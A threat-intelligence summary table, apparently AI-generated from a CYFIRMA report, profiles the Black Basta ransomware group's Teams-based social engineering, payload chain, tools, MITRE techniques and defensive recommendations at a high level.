| Category | Details |
|---|---|
| Threat Actors | Black Basta (Ransomware-as-a-Service Group) |
| Campaign Overview | Operates via phishing, vulnerability exploitation, social engineering (Microsoft Teams impersonation). Targets include various industries globally. Uses double extortion (data theft + ransomware). |
| Target Regions | Global; major attacks in sectors like healthcare, finance, construction, manufacturing, retail, and entertainment. |
| Methodology | Spam emails followed by direct Microsoft Teams contact; masquerades as IT help desk. Leverages remote desktop software (e.g., AnyDesk, Quick Assist). Deploys payloads systematically: AntispamConnectUS.exe (SystemBC) → Cobalt Strike. |
| Product Targeted | Microsoft Teams; endpoint vulnerabilities exploited. |
| Malware Reference | SystemBC (proxy malware/RAT), Cobalt Strike (used for lateral movement and remote control). |
| Tools Used | AnyDesk, Quick Assist, BITSAdmin, Qakbot, PowerShell, RClone, Cobalt Strike, SystemBC, Splashtop, EvilProxy, Netcat, WinSCP, and others. |
| Vulnerabilities Exploited | Microsoft Teams external communication setup, user susceptibility to phishing, and outdated systems/applications. |
| TTPs (MITRE) | Initial Access (T1566, T1190), Execution (T1059.001, T1047), Persistence (T1543.003), Defense Evasion (T1112, T1497), Credential Access (T1003), Lateral Movement (T1570), Impact (T1486). |
| Attribution | Notable attacks since April 2022; over 500 organizations targeted globally. Associated with the use of SystemBC in campaigns alongside other malware families. |
| Recommendations | Strategic: Maintain secure backups, adopt zero-trust architecture, enable MFA. Management: Develop breach prevention plans, invest in employee cybersecurity training. Tactical: Regularly update software, monitor/block IOCs, implement Sigma rules for anomaly detection. |
| Source | CYFIRMA |
Read full article : Read More
Disclaimer: The above summary has been generated by an AI language model.
Leave a Reply